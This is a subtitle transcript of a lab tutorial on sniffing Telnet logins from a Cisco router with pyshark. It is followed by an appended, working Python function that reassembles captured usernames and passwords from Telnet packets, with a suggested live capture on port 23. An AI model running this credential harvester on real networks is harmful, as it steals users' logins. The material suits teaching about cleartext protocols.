1
00:00:00,180 --> 00:00:00,450
Okay.

2
00:00:00,450 --> 00:00:06,150
So in this example, I've got a Telnet script that I've written. I'm going to import pyshark.

3
00:00:06,150 --> 00:00:10,170
I'm going to capture traffic off the wire in real time on the Ubuntu

4
00:00:10,230 --> 00:00:11,640
host on Ethernet 0.

5
00:00:12,000 --> 00:00:15,630
I've got a loop once again looking for Telnet traffic.

6
00:00:15,630 --> 00:00:18,240
So, is it Telnet in the packet?

7
00:00:18,660 --> 00:00:22,770
If it is, look for "username" in the string.

8
00:00:23,160 --> 00:00:26,550
In other words, look for "username" in the output of the packet.

9
00:00:27,000 --> 00:00:30,120
If you see "username", print the username.

10
00:00:30,480 --> 00:00:33,570
If you see "password", then print the password.

11
00:00:33,570 --> 00:00:41,340
Now, Telnet isn't as nice as the other protocols, and that's because the username and password are sent

12
00:00:41,820 --> 00:00:43,290
in individual packets.

13
00:00:43,290 --> 00:00:49,800
So we're not going to see everything as clearly as we saw with the other scripts, but that's not going

14
00:00:49,800 --> 00:00:50,340
to stop us.

15
00:00:50,340 --> 00:00:53,070
We'll still be able to capture the username and password.

16
00:00:53,460 --> 00:01:00,150
So again, cat telnet.py. There's our script.

17
00:01:01,710 --> 00:01:06,000
Let's run Python to capture the username and password.

18
00:01:06,000 --> 00:01:10,710
What I'll do in this example is use Ubuntu 2 to telnet to the router.

19
00:01:11,610 --> 00:01:14,790
So there's Ubuntu 1, which is our hacking server.

20
00:01:14,940 --> 00:01:19,950
Here is Ubuntu 2. The router IP address

21
00:01:20,720 --> 00:01:25,730
is 192.168.122.82.

22
00:01:26,490 --> 00:01:31,140
So, telnet 192.168.122.82.

23
00:01:31,470 --> 00:01:34,140
Notice we suddenly see some output here.

24
00:01:35,620 --> 00:01:38,080
So it's seeing something.
25
00:01:38,350 --> 00:01:40,450
It's captured this thing called "password".

26
00:01:41,290 --> 00:01:42,610
Put the password in.

27
00:01:42,970 --> 00:01:45,640
Don't know if you saw that. Notice:

28
00:01:46,090 --> 00:01:47,210
"ci".

29
00:01:47,260 --> 00:01:48,090
"sco".

30
00:01:48,130 --> 00:01:49,960
There's the Telnet password.

31
00:01:51,110 --> 00:01:56,180
There's a prompt. Type enable. Password.

32
00:01:56,210 --> 00:02:00,080
There's the enable password, cisco.

33
00:02:01,720 --> 00:02:02,590
Show run.

34
00:02:04,060 --> 00:02:06,220
We can see the running config here.

35
00:02:06,610 --> 00:02:14,800
Now again, Telnet doesn't do this very nicely because the data is all over the place.

36
00:02:14,800 --> 00:02:20,800
So I've kind of tried to highlight here that you must look for "password" after you see this line.

37
00:02:21,760 --> 00:02:28,990
So let's change the way the Cisco router works.

38
00:02:28,990 --> 00:02:31,540
I'll say username david password cisco.

39
00:02:31,570 --> 00:02:37,600
And rather than just using a standard password, I'll say login local.

40
00:02:37,600 --> 00:02:41,050
So a username and password are used when I telnet to the router.

41
00:02:41,990 --> 00:02:42,260
Okay.

42
00:02:42,260 --> 00:02:45,020
So let me go to the end here.

43
00:02:45,740 --> 00:02:46,850
Telnet to the router.

44
00:02:46,880 --> 00:02:48,620
Notice we see "username".

45
00:02:48,620 --> 00:02:51,380
So we're told: be careful, your username is going to be displayed now.

46
00:02:52,400 --> 00:02:53,090
David.

47
00:02:54,260 --> 00:02:57,650
There you can see the username,

48
00:02:57,830 --> 00:02:58,760
david.

49
00:02:59,180 --> 00:03:04,190
Now it gets copied twice because we're seeing the traffic from the PC to the router and from the router

50
00:03:04,190 --> 00:03:06,470
to the PC. Password:

51
00:03:06,470 --> 00:03:07,370
cisco.

52
00:03:08,330 --> 00:03:09,050
You can see that.

53
00:03:09,050 --> 00:03:11,150
Yes, cisco is the password.
54
00:03:11,570 --> 00:03:16,670
It was only sent once, because we don't see the password in the output here.

55
00:03:18,970 --> 00:03:20,020
Type enable.

56
00:03:20,500 --> 00:03:23,410
We can see that there, there's "enable".

57
00:03:24,580 --> 00:03:28,480
Notice we are warned another password is going to be displayed here.

58
00:03:28,900 --> 00:03:30,460
So I'll put the password in.

59
00:03:30,490 --> 00:03:32,110
There's our password of cisco.

60
00:03:32,500 --> 00:03:39,370
So again, Telnet isn't as good as OSPF or FTP or other protocols when it comes to capturing traffic.

61
00:03:39,730 --> 00:03:46,780
It's a bit all over the place, but you could save this to a file and then simply do a search for a

62
00:03:46,780 --> 00:03:53,020
keyword like I've done here, a bunch of lines and "password", and then you know that the password is

63
00:03:53,020 --> 00:03:54,130
just after that.

64
00:03:54,190 --> 00:04:01,300
Or you could do a search for the actual keyword "password" and see the passwords in the text just after

65
00:04:01,300 --> 00:04:01,630
that.

66
00:04:01,630 --> 00:04:08,110
So there is my password of cisco. Notice, as an example, if we type show run here, we'll see the actual

67
00:04:08,110 --> 00:04:10,780
password in the output here like this.

68
00:04:12,850 --> 00:04:16,959
And if I scroll down, I'll see

69
00:04:18,550 --> 00:04:19,870
the password over here.

70
00:04:20,320 --> 00:04:22,050
Okay, so Telnet isn't that great.

71
00:04:22,089 --> 00:04:28,510
Not that easy to do it as cleanly as the other protocols.

72
00:04:28,510 --> 00:04:31,750
But there's my basic Python script.

73
00:04:32,490 --> 00:04:36,630
And again, in this example, I'm using Sublime Text.

74
00:04:36,660 --> 00:04:37,780
Nice IDE.

75
00:04:37,860 --> 00:04:40,290
There are many others out there that are very good.

76
00:04:40,560 --> 00:04:44,670
You can see that the script looks a lot nicer in Sublime Text.

77
00:04:44,700 --> 00:04:46,020
Here's my OSPF script.
78
00:04:46,020 --> 00:04:47,460
It's only a few lines.

79
00:04:48,830 --> 00:04:50,390
Here's my FTP script.

80
00:04:50,780 --> 00:04:53,060
Here's my Telnet script.

81
00:04:53,510 --> 00:04:58,340
You could take these scripts and change them and make them a lot more powerful.

82
00:04:58,460 --> 00:05:03,410
I just wanted to show you a little bit about what Python can be used for and inspire you to think about

83
00:05:03,410 --> 00:05:05,000
the options available to you.

84
00:05:05,540 --> 00:05:08,210
Download these scripts and see what you can do with them.

85
00:05:08,240 --> 00:05:10,010
As always, be careful

86
00:05:10,040 --> 00:05:11,570
hacking networks.

87
00:05:11,570 --> 00:05:16,880
Make sure that you have permission to hack those networks or to grab usernames and passwords off those

88
00:05:16,880 --> 00:05:17,660
networks.
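The video's script does a substring match for "username" and "password" on every Telnet packet, which is why the output is "all over the place": Telnet sends one keystroke per packet, the router echoes the username back (so it appears twice) and the password never appears in the same packet as its prompt. The following is an added example, not the script from the video, showing how to reassemble the login instead. It tracks the two directions of one conversation separately, strips Telnet option negotiation (IAC sequences), remembers which prompt the router sent last, and records the line the client types in answer to it. The addresses, the sample packet list and the username/password values are constructed for the example; a live feed would come from pyshark's `LiveCapture(interface="eth0", bpf_filter="tcp port 23")`, passing each packet's `ip.src`, `ip.dst` and decoded `tcp.payload` hex field into `extract_credentials` (those field names are an assumption about pyshark, not something the video shows).

```python
from typing import Iterable, List, Optional, Tuple

# Added example, not the script shown in the video. Telnet sends each keystroke
# in its own packet, so a plain "password" substring match over packets shows
# fragments and echoes; this reassembles the login from both directions instead.
Packet = Tuple[str, str, bytes]  # (src_ip, dst_ip, TCP payload)

IAC, SB, SE = 0xFF, 0xFA, 0xF0
WILL, WONT, DO, DONT = 0xFB, 0xFC, 0xFD, 0xFE


def strip_telnet_options(payload: bytes) -> bytes:
    """Remove IAC option negotiation so only user-visible bytes remain."""
    out = bytearray()
    i, n = 0, len(payload)
    while i < n:
        b = payload[i]
        if b != IAC:
            out.append(b)
            i += 1
        elif i + 1 >= n:
            break                                   # truncated IAC at end of segment
        elif payload[i + 1] == IAC:
            out.append(IAC)                         # IAC IAC is a literal 0xFF
            i += 2
        elif payload[i + 1] == SB:
            end = payload.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2           # skip the whole subnegotiation
        elif payload[i + 1] in (WILL, WONT, DO, DONT):
            i += 3                                  # IAC <cmd> <option>
        else:
            i += 2                                  # two-byte command (NOP, AYT, ...)
    return bytes(out)


def extract_credentials(packets: Iterable[Packet], client: str, server: str) -> List[Tuple[str, str]]:
    """Pair each Username:/Password: prompt (server->client) with the line the
    client then types (client->server). Keeping the directions apart is what
    stops the router's echo of the username from turning up as a second credential."""
    creds: List[Tuple[str, str]] = []
    expecting: Optional[str] = None
    typed = bytearray()
    for src, dst, payload in packets:
        data = strip_telnet_options(payload)
        if (src, dst) == (server, client):
            text = data.decode("ascii", errors="replace").lower()
            kind, pos = max((("username", text.rfind("username:")),
                             ("password", text.rfind("password:"))), key=lambda kv: kv[1])
            if pos >= 0:                            # last prompt in the chunk wins
                expecting, typed = kind, bytearray()
        elif (src, dst) == (client, server):
            for b in data:
                if b in (0x08, 0x7F):               # backspace / delete
                    if typed:
                        typed.pop()
                elif b in (0x0D, 0x0A):             # Enter: CR LF or CR NUL
                    if expecting is not None:
                        creds.append((expecting, typed.decode("ascii", errors="replace")))
                        expecting = None
                    typed.clear()
                elif b != 0x00:                     # NUL after CR carries nothing
                    typed.append(b)
    return creds


CLIENT, ROUTER = "10.10.10.20", "10.10.10.1"        # constructed lab addresses


def _typed_line(text: str, echoed: bool) -> List[Packet]:
    """One packet per keystroke, each followed by the router's echo if echoed."""
    pkts: List[Packet] = []
    for ch in text:
        pkts.append((CLIENT, ROUTER, ch.encode()))
        if echoed:
            pkts.append((ROUTER, CLIENT, ch.encode()))
    return pkts + [(CLIENT, ROUTER, b"\r\n")]


# Constructed conversation: "login local" username/password, then "enable".
SAMPLE_PACKETS: List[Packet] = (
    [(ROUTER, CLIENT, bytes([IAC, WILL, 1, IAC, WILL, 3])),          # WILL ECHO, WILL SGA
     (ROUTER, CLIENT, b"\r\nUser Access Verification\r\n\r\nUsername: ")]
    + _typed_line("david", echoed=True)                              # router echoes the username
    + [(ROUTER, CLIENT, b"\r\nPassword: ")]
    + _typed_line("cisco", echoed=False)                             # but not the password
    + [(ROUTER, CLIENT, b"\r\nRouter>")]
    + _typed_line("enable", echoed=True)
    + [(ROUTER, CLIENT, b"\r\nPassword: ")]
    + _typed_line("cisco", echoed=False)
    + [(ROUTER, CLIENT, b"\r\nRouter#")]
)

if __name__ == "__main__":
    for kind, value in extract_credentials(SAMPLE_PACKETS, CLIENT, ROUTER):
        print(f"{kind}: {value}")
```

Run as-is it prints the login username, the login password and the enable password, each once, from a conversation in which the username bytes cross the wire twice. The direction check is the important part: feeding the same packets with the client and server roles swapped yields nothing, because the prompts are then on the wrong side. The backspace handling matters on real captures, since a user who mistypes and corrects a password leaves the wrong characters in the packet stream.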